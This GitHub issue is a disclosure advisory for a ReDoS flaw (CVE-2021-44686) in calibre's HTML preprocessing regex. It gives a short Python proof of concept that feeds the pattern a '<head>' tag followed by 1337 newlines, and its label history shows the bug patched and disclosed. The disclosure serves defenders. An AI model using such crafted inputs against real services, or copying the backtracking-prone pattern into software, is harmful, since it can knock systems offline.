Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ReDoS in calibre #18

Closed
dwisiswant0 opened this issue Nov 23, 2021 · 1 comment
Closed

ReDoS in calibre #18

dwisiswant0 opened this issue Nov 23, 2021 · 1 comment
Assignees
Labels
disclosed Disclosure/advisory has been published & disclosed patched Patch version released poc Proof-of-concept dropped
Projects

Comments

@dwisiswant0
Copy link
Owner

dwisiswant0 commented Nov 23, 2021

Description

calibre before 5.32.0 contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

CVE ID: CVE-2021-44686

Proof of Concept

Vulnerable code: https://github.com/kovidgoyal/calibre/blob/39a22268b930f0d0cf51a42b556982da5f3dbf4d/src/calibre/ebooks/conversion/preprocess.py#L383

To see that the regular expression is vulnerable, copy-paste it into a separate file & run the code as shown below.

import re

reg = re.compile(r'<head[^>]*>\n*(.*?)\n*</head>', re.IGNORECASE|re.DOTALL)
reg.match('<head>' + '\n' * 1337)

Impact

This issue may lead to a denial of service.

References

@dwisiswant0 dwisiswant0 added the needs triage Coordinated disclosure that need to be triaged label Nov 23, 2021
@dwisiswant0 dwisiswant0 self-assigned this Nov 23, 2021
@dwisiswant0 dwisiswant0 added this to Needs triage in Advisory via automation Nov 23, 2021
@dwisiswant0 dwisiswant0 added patched Patch version released triaged Disclosure triaged and removed needs triage Coordinated disclosure that need to be triaged labels Nov 23, 2021
@dwisiswant0
Copy link
Owner Author

CVE requested.

@dwisiswant0 dwisiswant0 added TBD Advisory to be determined and removed triaged Disclosure triaged labels Dec 4, 2021
@github-actions github-actions bot removed the TBD Advisory to be determined label Dec 5, 2021
@dwisiswant0 dwisiswant0 added the disclosed Disclosure/advisory has been published & disclosed label Dec 6, 2021
@dwisiswant0 dwisiswant0 changed the title ReDoS in launchpad#1951979 ReDoS in calibre Dec 6, 2021
Advisory automation moved this from Needs triage to Disclosed Dec 6, 2021
@dwisiswant0 dwisiswant0 added the poc Proof-of-concept dropped label Dec 6, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
disclosed Disclosure/advisory has been published & disclosed patched Patch version released poc Proof-of-concept dropped
Projects
Advisory
Disclosed
Development

No branches or pull requests

1 participant